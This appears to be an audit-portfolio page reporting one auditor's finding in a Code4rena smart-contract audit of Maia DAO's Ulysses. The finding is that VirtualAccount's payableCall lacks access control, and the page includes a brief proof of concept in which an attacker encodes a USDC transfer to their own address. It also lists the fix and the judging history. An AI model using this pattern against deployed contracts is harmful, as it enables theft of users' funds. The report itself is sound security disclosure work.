Back to tank's contests

Maia DAO - Ulysses - tank's results

Harnessing the power of Arbitrum, Ulysses Omnichain specializes in Virtualized Liquidity Management.

General Information

Platform: Code4rena

Start Date: 22/09/2023

Pot Size: $100,000 USDC

Total HM: 15

Participants: 175

Period: 14 days

Judge: alcueca

Total Solo HM: 4

Id: 287

League: ETH

Maia DAO

Findings Distribution

Researcher Performance

Rank: 163/175

Findings: 1

Award: $0.11

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryMaia DAO

Findings Information

🌟 Selected for report: 0xTheC0der

Also found by: 0x180db, 0xDING99YA, 0xRstStn, 0xTiwa, 0xWaitress, 0xblackskull, 0xfuje, 3docSec, Aamir, Black_Box_DD, HChang26, Hama, Inspecktor, John_Femi, Jorgect, Kek, KingNFT, Kow, Limbooo, MIQUINHO, MrPotatoMagic, NoTechBG, Noro, Pessimistic, QiuhaoLi, SovaSlava, SpicyMeatball, T1MOH, TangYuanShen, Vagner, Viktor_Cortess, Yanchuan, _eperezok, alexweb3, alexxander, ast3ros, ayden, bin2chen, blutorque, btk, ciphermarco, ether_sky, gumgumzum, gztttt, hals, imare, its_basu, joaovwfreire, josephdara, klau5, kodyvim, ladboy233, marqymarq10, mert_eren, minhtrng, n1punp, nobody2018, oada, orion, peakbolt, peritoflores, perseverancesuccess, pfapostol, rvierdiiev, stuxy, tank, unsafesol, ustas, windhustler, zambody, zzzitron

Awards

0.1127 USDC - $0.11

Labels

bug
3 (High Risk)
satisfactory
sufficient quality report
duplicate-885

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112

Vulnerability details

Impact

an attacker can steal all assets in VirtualAccount. Every functions in VirtualAccount have requiresApprovedCaller except function payableCall(PayableCall[] calldata calls) public payable returns (bytes[] memory returnData) ref: https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85, so the attacker can call any contracts with any calldatas. (eg. transfer NFT, transfer ERC20 tokens)

Proof of Concept

according to this line: https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L101 attacker can send

  • _call.target = USDC
  • _call.callData = abi.encodeWithSelector(IERC20.transfer.selector, <attacker address>, <amount>)

Tools Used

  • manual review
  • add requiresApprovedCaller modifier

Assessed type

Access Control

#0 - c4-pre-sort

2023-10-08T14:04:19Z

0xA5DF marked the issue as duplicate of #888

#1 - c4-pre-sort

2023-10-08T14:37:20Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-26T11:29:15Z

alcueca marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter